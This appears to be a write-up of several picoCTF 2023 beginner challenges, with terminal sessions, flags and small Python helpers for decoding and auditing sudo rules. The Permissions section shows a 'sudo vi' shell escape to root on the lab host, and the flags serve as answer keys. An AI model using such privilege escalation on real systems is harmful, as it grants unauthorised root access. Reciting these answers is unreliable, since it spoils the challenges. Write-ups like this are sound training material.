picoCTF2023
chrono
100 points
Tags: General Skills, linux
AUTHOR: MUBARAK MIKAIL
Description
How to automate tasks to run at intervals on linux servers?
Additional details will be available after launching your challenge instance.
picoCTF{Sch3DUL7NG_T45K3_L1NUX_abe2c490}
┌──(kali㉿kali)-[~/Desktop/picoCTF]
└─$ ssh picoplayer@saturn.picoctf.net -p 64468
picoplayer@challenge:~$ crontab -e
no crontab for picoplayer - using an empty one
update-alternatives: error: no alternatives for editor
/usr/bin/sensible-editor: 25: editor: not found
/usr/bin/sensible-editor: 28: nano: not found
/usr/bin/sensible-editor: 31: nano-tiny: not found
/usr/bin/sensible-editor: 34: vi: not found
Couldn't find an editor!
Set the $EDITOR environment variable to your desired editor.
crontab: "/usr/bin/sensible-editor" exited with status 1
picoplayer@challenge:~$ sudo crontab -e
[sudo] password for picoplayer:
picoplayer is not in the sudoers file. This incident will be reported.
picoplayer@challenge:~$ cd /etc
picoplayer@challenge:/etc$ cat crontab
# picoCTF{Sch3DUL7NG_T45K3_L1NUX_abe2c490}
findme
100 points
Tags: Web Exploitation
AUTHOR: GEOFFREY NJOGU
Description
Help us test the form by submitting the username as test and password as test!
Additional details will be available after launching your challenge instance.
picoCTF{proxies_all_the_way_599a80c2}
Go to the site, follow the instructions.
Poked around the site, but could not find anything.
Use the browser's Developer Tools to capture traffic from the first page through the successful login. Two entries have no response:
http://saturn.picoctf.net:56021/next-page/id=cGljb0NURntwcm94aWVzX2Fs
http://saturn.picoctf.net:56021/next-page/id=bF90aGVfd2F5XzU5OWE4MGMyfQ==
The id values look base64-encoded. Decode these two id values and you get the flag.
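The decoding step as an added Python example (not part of the original write-up): it pulls the id value out of each captured URL in request order, checks that it is strict base64, and joins the decoded pieces. The function name and the regex are this example's own; the URLs are the two from the capture above.

```python
import base64
import binascii
import re

# The two requests seen in the browser's network tab, in capture order.
CAPTURED_URLS = [
    "http://saturn.picoctf.net:56021/next-page/id=cGljb0NURntwcm94aWVzX2Fs",
    "http://saturn.picoctf.net:56021/next-page/id=bF90aGVfd2F5XzU5OWE4MGMyfQ==",
]

# id sits in the path ("/next-page/id=..."), not in a query string,
# so urllib.parse.parse_qs would not see it; match it directly.
ID_RE = re.compile(r"/id=([A-Za-z0-9+/]+={0,2})$")


def decode_id_fragments(urls):
    """Return the text spread across the id values of a redirect chain."""
    parts = []
    for url in urls:
        m = ID_RE.search(url)
        if not m:
            continue  # not one of the redirect hops
        try:
            # validate=True rejects anything that is not strict base64
            raw = base64.b64decode(m.group(1), validate=True)
        except binascii.Error:
            continue  # matched the pattern but has bad length or padding
        parts.append(raw.decode("utf-8", errors="replace"))
    return "".join(parts)


if __name__ == "__main__":
    print(decode_id_fragments(CAPTURED_URLS))
```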
hideme
100 points
Tags: Forensics, steganography
AUTHOR: GEOFFREY NJOGU
Description
Every file gets a flag. The SOC analyst saw one image being sent back and forth between two people. They decided to investigate and found out that there was more than what meets the eye here.
picoCTF{Hidding_An_imag3_within_@n_ima9e_c31884c7}
Try an online tool first.
binwalk finds hidden files inside the image.
┌──(kali㉿kali)-[~/Desktop/picoCTF]
└─$ binwalk flag.png
DECIMAL HEXADECIMAL DESCRIPTION
--------------------------------------------------------------------------------
0 0x0 PNG image, 512 x 504, 8-bit/color RGBA, non-interlaced
41 0x29 Zlib compressed data, compressed
39739 0x9B3B Zip archive data, at least v1.0 to extract, name: secret/
39804 0x9B7C Zip archive data, at least v2.0 to extract, compressed size: 2832, uncompressed size: 2984, name: secret/flag.png
42871 0xA777 End of Zip archive, footer length: 22
┌──(kali㉿kali)-[~/Desktop/picoCTF]
└─$ binwalk -e flag.png
DECIMAL HEXADECIMAL DESCRIPTION
--------------------------------------------------------------------------------
0 0x0 PNG image, 512 x 504, 8-bit/color RGBA, non-interlaced
41 0x29 Zlib compressed data, compressed
39739 0x9B3B Zip archive data, at least v1.0 to extract, name: secret/
39804 0x9B7C Zip archive data, at least v2.0 to extract, compressed size: 2832, uncompressed size: 2984, name: secret/flag.png
42871 0xA777 End of Zip archive, footer length: 22
┌──(kali㉿kali)-[~/Desktop/picoCTF]
└─$ ls
aaa.txt atbash.jpg encrypted.txt flag.png _flag.png.extracted
┌──(kali㉿kali)-[~/Desktop/picoCTF]
└─$ cd _flag.png.extracted
┌──(kali㉿kali)-[~/Desktop/picoCTF/_flag.png.extracted]
└─$ ls
29 29.zlib 9B3B.zip secret
┌──(kali㉿kali)-[~/Desktop/picoCTF/_flag.png.extracted]
└─$ cd secret
┌──(kali㉿kali)-[~/Desktop/picoCTF/_flag.png.extracted/secret]
└─$ ls
flag.png
HideToSee
100 points
Tags: Cryptography
AUTHOR: SUNDAY JACOB NWANYIM
Description
How about some hide and seek heh? Look at this image here.
picoCTF{atbash_crack_6c4bcb08}
Tried online tool:
Online steg site with all the tools together
It has strings, exiftool and some others. The simple ones didn't work.
Try steghide.
Trying the passphrase atbash with steghide does not work.
┌──(kali㉿kali)-[~/Desktop/picoCTF]
└─$ steghide info atbash.jpg
"atbash.jpg":
format: jpeg
capacity: 2.4 KB
Try to get information about embedded data ? (y/n) y
Enter passphrase:
steghide: could not extract any data with that passphrase!
Trying without a password works.
┌──(kali㉿kali)-[~/Desktop/picoCTF]
└─$ steghide info atbash.jpg
"atbash.jpg":
format: jpeg
capacity: 2.4 KB
Try to get information about embedded data ? (y/n) y
Enter passphrase:
embedded file "encrypted.txt":
size: 31.0 Byte
encrypted: rijndael-128, cbc
compressed: yes
Extract file without password.
┌──(kali㉿kali)-[~/Desktop/picoCTF]
└─$ steghide extract -sf atbash.jpg
Enter passphrase:
wrote extracted data to "encrypted.txt".
┌──(kali㉿kali)-[~/Desktop/picoCTF]
└─$ cat encrypted.txt
krxlXGU{zgyzhs_xizxp_6x4yxy08}
Notice the image says atbash, so decode this string with an Atbash decoder:
picoCTF{atbash_crack_6c4bcb08}
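The Atbash step as an added Python example (not part of the original write-up; the names are this example's own). Atbash swaps a with z, b with y and so on, so the same function both encodes and decodes, and everything that is not a letter is left alone.

```python
import string

# Build one translation table covering both cases: a<->z, b<->y, ...
_LOWER = string.ascii_lowercase
_UPPER = string.ascii_uppercase
ATBASH = str.maketrans(_LOWER + _UPPER, _LOWER[::-1] + _UPPER[::-1])


def atbash(text):
    """Apply Atbash; digits, braces and underscores pass through unchanged."""
    return text.translate(ATBASH)


# Contents of encrypted.txt from the steghide extraction above.
CIPHERTEXT = "krxlXGU{zgyzhs_xizxp_6x4yxy08}"

if __name__ == "__main__":
    print(atbash(CIPHERTEXT))
```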
MatchTheRegex
100 points
Tags: Web Exploitation
AUTHOR: SUNDAY JACOB NWANYIM
Description
How about trying to match a regular expression? The website is running here.
picoCTF{succ3ssfully_matchtheregex_18b306a0}
First try searching with ***, which returns an error.
Then try searching with picoCTF***, which works.
money-ware
100 points
Tags:
Author: Juni19
Description
Flag format: picoCTF{Malwarename} The first letter of the malware name should be capitalized and the rest lowercase. Your friend just got hacked and has been asked to pay some bitcoins to 1Mz7153HMuxXTuR2R1t78mGSdzaAtNbBWX. He doesn’t seem to understand what is going on and asks you for advice. Can you identify what malware he’s being a victim of?
Just google
"1Mz7153HMuxXTuR2R1t78mGSdzaAtNbBWX malware"
You will find news that points to a malware named Petya.
picoCTF{Petya}
PcapPoisoning
100 points
Tags: Forensics, pcap
AUTHOR: MUBARAK MIKAIL
Description
How about some hide and seek heh? Download this file and find the flag.
Open the file in Wireshark.
Search for the keyword pico and you will find the flag.
picoCTF{P64P_4N4L7S1S_SU55355FUL_ba1a6097}
Permissions
100 points
Tags: General Skills, vim
AUTHOR: GEOFFREY NJOGU
Description
Can you read files in the root file? The system admin has provisioned an account for you on the main server: ssh -p 58850 picoplayer@saturn.picoctf.net Password: cbjrrAIyO4 Can you login and read the root file?
┌──(kali㉿kali)-[~/Desktop/picoCTF]
└─$ ssh -p 58850 picoplayer@saturn.picoctf.net
The authenticity of host '[saturn.picoctf.net]:58850 ([3.12.65.157]:58850)' can't be established.
ED25519 key fingerprint is SHA256:oCgGxVpfRH0kgCbgMYs6D+4eE2zVsDCCjmEzmEiK2iQ.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '[saturn.picoctf.net]:58850' (ED25519) to the list of known hosts.
picoplayer@saturn.picoctf.net's password:
picoplayer@challenge:~$ cd /root
-bash: cd: /root: Permission denied
picoplayer@challenge:~$ whoami
picoplayer
picoplayer@challenge:~$ sudo -i
[sudo] password for picoplayer:
Sorry, user picoplayer is not allowed to execute '/bin/bash' as root on challenge.
picoplayer@challenge:~$ sudo -l
[sudo] password for picoplayer:
Matching Defaults entries for picoplayer on challenge:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User picoplayer may run the following commands on challenge:
(ALL) /usr/bin/vi
First see if you can use vi to open the flag.txt file under /root.
picoplayer@challenge:~$ vi /root/flag.txt
picoplayer@challenge:~$ sudo vi /root/flag.txt
Nothing showed up.
sudo -l shows that vi can be run with sudo, so check which command can be used to get a root shell from vi:
https://gtfobins.github.io/gtfobins/vi/#sudo
picoplayer@challenge:~$ sudo vi -c ':!/bin/sh' /dev/null
# cd /root
# ls
flag.txt
# cat flag.txt
# ls -al
total 16
drwx------ 1 root root 38 Mar 15 08:17 .
drwxr-xr-x 1 root root 63 Mar 15 08:14 ..
-rw-r--r-- 1 root root 3106 Dec 5 2019 .bashrc
-rw-r--r-- 1 root root 35 Mar 15 02:46 .flag.txt
-rw-r--r-- 1 root root 161 Dec 5 2019 .profile
-rw------- 1 root root 707 Mar 15 08:17 .viminfo
-rw-r--r-- 1 root root 0 Mar 15 08:17 flag.txt
# cat .flag.txt
picoCTF{uS1ng_v1m_3dit0r_27f6a05a}
#
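The weakness here is the sudoers rule itself: an editor run through sudo can start a shell as the run-as user. The added Python example below (not part of the original write-up) audits sudo -l output for such rules. The binary list is an illustrative subset chosen for this example, the function name is its own, and the sample input is the output from the session above with the Defaults line abridged.

```python
import os
import re

# Illustrative subset of editors and pagers that can spawn a shell from
# inside the program; a real audit would use a maintained list.
SHELL_ESCAPE_BINARIES = {"vi", "vim", "view", "nano", "less", "more", "man", "ed"}

# `sudo -l` output from the session above (Defaults line abridged).
SUDO_L_OUTPUT = """Matching Defaults entries for picoplayer on challenge:
    env_reset, mail_badpass
User picoplayer may run the following commands on challenge:
    (ALL) /usr/bin/vi
"""

# "(runas) [TAG: ...] command[, command...]"
RULE_RE = re.compile(
    r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z_]+:\s*)*)(?P<cmds>.+)$")


def risky_sudo_rules(sudo_l_text):
    """Return (runas, command) pairs that hand out a shell-capable program."""
    findings = []
    in_rules = False
    for line in sudo_l_text.splitlines():
        if "may run the following commands" in line:
            in_rules = True      # rules start after this header line
            continue
        m = RULE_RE.match(line) if in_rules else None
        if not m:
            continue
        for cmd in m.group("cmds").split(","):
            cmd = cmd.strip()
            if not cmd:
                continue
            if cmd == "ALL":     # unrestricted rule
                findings.append((m.group("runas"), cmd))
                continue
            binary = os.path.basename(cmd.split()[0])
            if binary in SHELL_ESCAPE_BINARIES:
                findings.append((m.group("runas"), cmd))
    return findings


if __name__ == "__main__":
    for runas, cmd in risky_sudo_rules(SUDO_L_OUTPUT):
        print("review: runs as (%s): %s" % (runas, cmd))
```

Where a user only needs to edit one specific file, a sudoedit rule for that file avoids running the editor as root.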
ReadMyCert
100 points
Tags: Cryptography
AUTHOR: SUNDAY JACOB NWANYIM
Description
How about we take you on an adventure on exploring certificate signing requests. Take a look at this CSR file here.
Download the CSR file and run it through a base64 decoder; decoding the file gives you the flag. If you want to read all the contents, try a CSR decoder such as https://www.sslshopper.com/csr-decoder.html. The flag is the common name of the cert.
picoCTF{read_mycert_12eba7f1}